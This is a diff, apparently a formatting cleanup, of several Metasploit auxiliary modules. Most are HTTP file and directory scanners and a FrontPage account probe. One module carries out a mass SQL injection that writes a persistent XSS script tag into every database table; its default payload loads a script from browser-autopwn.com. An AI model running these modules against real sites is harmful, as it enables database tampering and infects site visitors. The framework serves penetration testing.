||||
[
|
||||
OptString.new('PATH', [ true, "The path to identify files", '/']),
|
||||
OptString.new('EXT', [ false, "Append file extension to use", '']),
|
||||
OptPath.new('DICTIONARY', [ false, "Path of word dictionary to use",
|
||||
OptPath.new('DICTIONARY', [ false, "Path of word dictionary to use",
|
||||
File.join(Msf::Config.install_root, "data", "wmap", "wmap_files.txt")
|
||||
]
|
||||
)
|
||||
], self.class)
|
||||
|
||||
], self.class)
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptInt.new('ErrorCode', [ true, "The expected http code for non existant files", 404]),
|
||||
OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use",
|
||||
OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use",
|
||||
File.join(Msf::Config.install_root, "data", "wmap", "wmap_404s.txt")
|
||||
]
|
||||
),
|
||||
OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ]),
|
||||
OptInt.new('TestThreads', [ true, "Number of test threads", 25])
|
||||
], self.class)
|
||||
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
conn = false
|
||||
|
||||
tpath = datastore['PATH']
|
||||
|
||||
tpath = datastore['PATH']
|
||||
if tpath[-1,1] != '/'
|
||||
tpath += '/'
|
||||
end
|
||||
|
||||
|
||||
nt = datastore['TestThreads'].to_i
|
||||
nt = 1 if nt == 0
|
||||
|
||||
|
||||
dm = datastore['NoDetailMessages']
|
||||
|
||||
|
||||
queue = []
|
||||
|
||||
|
||||
File.open(datastore['DICTIONARY']).each do |testf|
|
||||
queue << testf.strip
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
#
|
||||
# Detect error code
|
||||
#
|
||||
ecode = datastore['ErrorCode'].to_i
|
||||
#
|
||||
ecode = datastore['ErrorCode'].to_i
|
||||
begin
|
||||
randfile = Rex::Text.rand_text_alpha(5).chomp
|
||||
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => tpath+randfile+ datastore['EXT'],
|
||||
'method' => 'GET',
|
||||
@ -87,8 +87,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
}, 20)
|
||||
|
||||
return if not res
|
||||
|
||||
tcode = res.code.to_i
|
||||
|
||||
tcode = res.code.to_i
|
||||
|
||||
# Look for a string we can signature on as well
|
||||
if(tcode >= 200 and tcode <= 299)
|
||||
@ -109,37 +109,37 @@ class Metasploit3 < Msf::Auxiliary
|
||||
ecode = tcode
|
||||
print_status("Using code '#{ecode}' as not found.")
|
||||
end
|
||||
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
conn = false
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
|
||||
conn = false
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
|
||||
|
||||
while(not queue.empty?)
|
||||
t = []
|
||||
1.upto(nt) do
|
||||
1.upto(nt) do
|
||||
t << Thread.new(queue.shift) do |testf|
|
||||
Thread.current.kill if not testf
|
||||
|
||||
|
||||
testfext = testf.chomp + datastore['EXT']
|
||||
res = send_request_cgi({
|
||||
'uri' => tpath+testfext,
|
||||
'method' => 'GET',
|
||||
'ctype' => 'text/plain'
|
||||
}, 20)
|
||||
|
||||
|
||||
if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg))))
|
||||
if dm == false
|
||||
print_status("NOT Found #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}")
|
||||
print_status("NOT Found #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}")
|
||||
#blah
|
||||
end
|
||||
else
|
||||
if res.code.to_i == 400 and ecode != 400
|
||||
print_error("Server returned an error code. #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}")
|
||||
if res.code.to_i == 400 and ecode != 400
|
||||
print_error("Server returned an error code. #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}")
|
||||
else
|
||||
print_status("Found #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}")
|
||||
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'HTTP',
|
||||
@ -147,8 +147,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:type => 'FILE',
|
||||
:data => "#{tpath}#{testfext} Code: #{res.code}"
|
||||
)
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
@ -1,5 +1,9 @@
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -45,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
info = (datastore['SSL'] ? "https" : "http") + "://#{target_host}#{port}/"
|
||||
|
||||
|
||||
connect
|
||||
|
||||
sock.put("GET /_vti_inf.html HTTP/1.1\r\n" + "TE: deflate,gzip;q=0.3\r\n" + "Keep-Alive: 300\r\n" +
|
||||
@ -77,27 +81,27 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def check_account(info, fpversion, target_host)
|
||||
|
||||
return if not fpversion
|
||||
return if not fpversion
|
||||
|
||||
connect
|
||||
|
||||
# http://msdn2.microsoft.com/en-us/library/ms454298.aspx
|
||||
# http://msdn2.microsoft.com/en-us/library/ms454298.aspx
|
||||
method = "method=open+service:#{fpversion}&service_name=/"
|
||||
|
||||
req = "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1\r\n" + "TE: deflate,gzip;q=0.3\r\n" +
|
||||
"Keep-Alive: 300\r\n" + "Connection: Keep-Alive, TE\r\n" + "Host: #{target_host}\r\n" +
|
||||
req = "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1\r\n" + "TE: deflate,gzip;q=0.3\r\n" +
|
||||
"Keep-Alive: 300\r\n" + "Connection: Keep-Alive, TE\r\n" + "Host: #{target_host}\r\n" +
|
||||
"User-Agent: " + datastore['UserAgent'] + "\r\n" + "Content-Type: application/x-www-form-urlencoded\r\n" +
|
||||
"Content-Length: #{method.length}\r\n\r\n" + method + "\r\n\r\n"
|
||||
|
||||
"Content-Length: #{method.length}\r\n\r\n" + method + "\r\n\r\n"
|
||||
|
||||
sock.put(req)
|
||||
res = sock.get_once
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
if(res and res.match(/^HTTP\/1\.[01]\s+([^\s]+)\s+(.*)/))
|
||||
retcode = $1
|
||||
retmsg = $2.strip
|
||||
|
||||
|
||||
if(retcode == "100")
|
||||
res = sock.get_once
|
||||
if(res and res.match(/^HTTP\/1\.[01]\s+([^\s]+)\s+(.*)/))
|
||||
@ -122,7 +126,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("#{info} FrontPage Unknown Response [#{retcode}]")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
disconnect
|
||||
end
|
||||
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -22,17 +22,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'HTTP Microsoft SQL Injection Table XSS Infection',
|
||||
'Description' => %q{
|
||||
This module implements the mass SQL injection attack in
|
||||
This module implements the mass SQL injection attack in
|
||||
use lately by concatenation of HTML string that forces a persistant
|
||||
XSS attack to redirect user browser to a attacker controller website.
|
||||
},
|
||||
'Author' => [ 'et' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URI', [ true, "The path/file to identify backups", '/index.asp']),
|
||||
@ -40,17 +40,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||
OptString.new('VULN_PAR', [ true, "Vulnerable parameter name", 'p1']),
|
||||
OptBool.new('TEXT_INT_INJECTION', [ true, "Perform string injection", false]),
|
||||
OptBool.new('COMMENTED', [ true, "Comment end of query", true]),
|
||||
OptString.new('EVIL_HTML', [ true, "Evil HTML to add to tables", '<script src=http://browser-autopwn.com/evilscript.js></script>']),
|
||||
], self.class)
|
||||
|
||||
OptString.new('EVIL_HTML', [ true, "Evil HTML to add to tables", '<script src=http://browser-autopwn.com/evilscript.js></script>']),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def wmap_enabled
|
||||
false
|
||||
end
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
|
||||
#Weird to indent for practical reasons.
|
||||
infstr = %Q{
|
||||
DECLARE @T varchar(255),@C varchar(255)
|
||||
@ -71,36 +71,36 @@ DECLARE @T varchar(255),@C varchar(255)
|
||||
|
||||
prestr = ";DECLARE @S NVARCHAR(4000);SET @S=CAST("
|
||||
poststr = " AS NVARCHAR(4000));EXEC(@S);"
|
||||
|
||||
|
||||
gvars = queryparse(datastore['QUERY']) #Now its a Hash
|
||||
|
||||
|
||||
if gvars.has_key?(datastore['VULN_PAR'])
|
||||
|
||||
|
||||
prestr = datastore['TEXT_INT_INJECTION'] ? "\'#{prestr}" : nil
|
||||
poststr = datastore['COMMENTED'] ? "#{poststr}--" : nil
|
||||
|
||||
attstr = ""
|
||||
infstr.unpack("C*").collect! { |i| attstr += i.to_s(base=16).upcase+"00" }
|
||||
attstr = ""
|
||||
infstr.unpack("C*").collect! { |i| attstr += i.to_s(base=16).upcase+"00" }
|
||||
gvars[datastore['VULN_PAR']] += prestr + "0x"+attstr + poststr
|
||||
else
|
||||
else
|
||||
print_status("Error: Vulnerable parameter is not part of the supplied query string.")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
begin
|
||||
normalres = send_request_cgi({
|
||||
'uri' => datastore['URI'],
|
||||
'vars_get' => gvars,
|
||||
'vars_get' => gvars,
|
||||
'method' => 'GET',
|
||||
'ctype' => 'text/plain'
|
||||
}, 20)
|
||||
|
||||
rescue ::Rex::ConnectionError
|
||||
rescue ::Errno::EPIPE
|
||||
rescue ::Errno::EPIPE
|
||||
end
|
||||
|
||||
print_status("Request sent.")
|
||||
|
||||
|
||||
print_status("Request sent.")
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
@ -1,5 +1,9 @@
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -17,27 +21,27 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'HTTP Previous Directory File Scanner',
|
||||
'Description' => %q{
|
||||
This module identifies files in the first parent directory with same name as
|
||||
the given directory path. Example: Test /backup/files/ will look for the
|
||||
following files /backup/files.ext .
|
||||
following files /backup/files.ext .
|
||||
},
|
||||
'Author' => [ 'et [at] metasploit.com' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('PATH', [ true, "The test path. The default value will not work.", '/'])
|
||||
], self.class)
|
||||
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
extensions = [
|
||||
'.null',
|
||||
extensions = [
|
||||
'.null',
|
||||
'.backup',
|
||||
'.bak',
|
||||
'.c',
|
||||
@ -49,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'.htm',
|
||||
'.jar',
|
||||
'.log',
|
||||
'.old',
|
||||
'.old',
|
||||
'.orig',
|
||||
'.o',
|
||||
'.tar',
|
||||
@ -63,18 +67,18 @@ class Metasploit3 < Msf::Auxiliary
|
||||
]
|
||||
|
||||
tpath = datastore['PATH']
|
||||
|
||||
|
||||
if tpath.eql? "/"||""
|
||||
print_error("Blank or default PATH set.");
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
if tpath[-1,1] != '/'
|
||||
tpath += '/'
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
extensions << datastore['EXT']
|
||||
|
||||
|
||||
extensions.each { |ext|
|
||||
begin
|
||||
testf = tpath.chop+ext
|
||||
@ -85,9 +89,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'ctype' => 'text/plain'
|
||||
}, 20)
|
||||
|
||||
if (res and res.code >= 200 and res.code < 300)
|
||||
if (res and res.code >= 200 and res.code < 300)
|
||||
print_status("Found #{wmap_base_url}#{testf}")
|
||||
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'HTTP',
|
||||
@ -95,16 +99,16 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:type => 'FILE',
|
||||
:data => "#{testf} Code: #{res.code}"
|
||||
)
|
||||
|
||||
|
||||
else
|
||||
print_status("NOT Found #{wmap_base_url}#{testf}")
|
||||
print_status("NOT Found #{wmap_base_url}#{testf}")
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
|
||||
|
||||
}
|
||||
|
||||
|
||||
end
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -23,42 +23,42 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'HTTP File Extension Scanner',
|
||||
'Description' => %q{
|
||||
This module identifies the existence of additional files
|
||||
This module identifies the existence of additional files
|
||||
by modifying the extension of an existing file.
|
||||
|
||||
|
||||
},
|
||||
'Author' => [ 'et [at] cyberspace.org' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('PATH', [ true, "The path/file to identify additional files", '/default.asp']),
|
||||
OptString.new('EXT', [ false, "File extension to replace (blank for automatic replacement of extension)", '']),
|
||||
OptString.new('EXT', [ false, "File extension to replace (blank for automatic replacement of extension)", '']),
|
||||
], self.class)
|
||||
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptInt.new('ErrorCode', [ true, "The expected http code for non existant files", 404]),
|
||||
OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use",
|
||||
OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use",
|
||||
File.join(Msf::Config.install_root, "data", "wmap", "wmap_404s.txt")
|
||||
]
|
||||
),
|
||||
OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ])
|
||||
], self.class)
|
||||
|
||||
|
||||
], self.class)
|
||||
|
||||
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
|
||||
conn = false
|
||||
|
||||
|
||||
dm = datastore['NoDetailMessages']
|
||||
|
||||
|
||||
extensions= [
|
||||
'bak',
|
||||
'txt',
|
||||
@ -72,19 +72,19 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
tpathfile = Pathname.new(datastore['PATH'])
|
||||
tpathnoext = tpathfile.to_s[0..datastore['PATH'].rindex(tpathfile.extname)]
|
||||
|
||||
|
||||
|
||||
extensions.each { |testext|
|
||||
|
||||
|
||||
#
|
||||
# Detect error code. This module is a special case as each extension
|
||||
# usually is handled diferently by the server with different error codes
|
||||
#
|
||||
ecode = datastore['ErrorCode'].to_i
|
||||
# usually is handled diferently by the server with different error codes
|
||||
#
|
||||
ecode = datastore['ErrorCode'].to_i
|
||||
begin
|
||||
randchars = Rex::Text.rand_text_alpha(3).chomp
|
||||
tpath = tpathnoext+randchars+testext
|
||||
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => tpath,
|
||||
'method' => 'GET',
|
||||
@ -92,14 +92,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
}, 20)
|
||||
|
||||
return if not res
|
||||
|
||||
tcode = res.code.to_i
|
||||
|
||||
tcode = res.code.to_i
|
||||
|
||||
emesg = ""
|
||||
|
||||
|
||||
# Look for a string we can signature on as well
|
||||
if(tcode >= 200 and tcode <= 299)
|
||||
|
||||
|
||||
File.open(datastore['HTTP404Sigs']).each do |str|
|
||||
if(res.body.index(str))
|
||||
emesg = str
|
||||
@ -117,14 +117,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
ecode = tcode
|
||||
print_status("Using code '#{ecode}' as not found.")
|
||||
end
|
||||
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
conn = false
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
conn = false
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
|
||||
|
||||
#if not conn return
|
||||
|
||||
|
||||
begin
|
||||
tpath = tpathnoext+testext
|
||||
res = send_request_cgi({
|
||||
@ -132,18 +132,18 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'method' => 'GET',
|
||||
'ctype' => 'text/plain'
|
||||
}, 20)
|
||||
|
||||
|
||||
if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg))))
|
||||
if dm == false
|
||||
print_status("NOT Found #{wmap_base_url}#{tpath} #{res.code.to_i}")
|
||||
print_status("NOT Found #{wmap_base_url}#{tpath} #{res.code.to_i}")
|
||||
#blah
|
||||
end
|
||||
else
|
||||
if res.code.to_i == 400 and ecode != 400
|
||||
print_error("Server returned an error code. #{wmap_base_url}#{tpath} #{res.code.to_i}")
|
||||
if res.code.to_i == 400 and ecode != 400
|
||||
print_error("Server returned an error code. #{wmap_base_url}#{tpath} #{res.code.to_i}")
|
||||
else
|
||||
print_status("Found #{wmap_base_url}#{tpath}")
|
||||
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'HTTP',
|
||||
@ -151,14 +151,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:type => 'FILE',
|
||||
:data => "#{tpath} Code: #{res.code}"
|
||||
)
|
||||
|
||||
|
||||
end
|
||||
end
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
}
|
||||
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|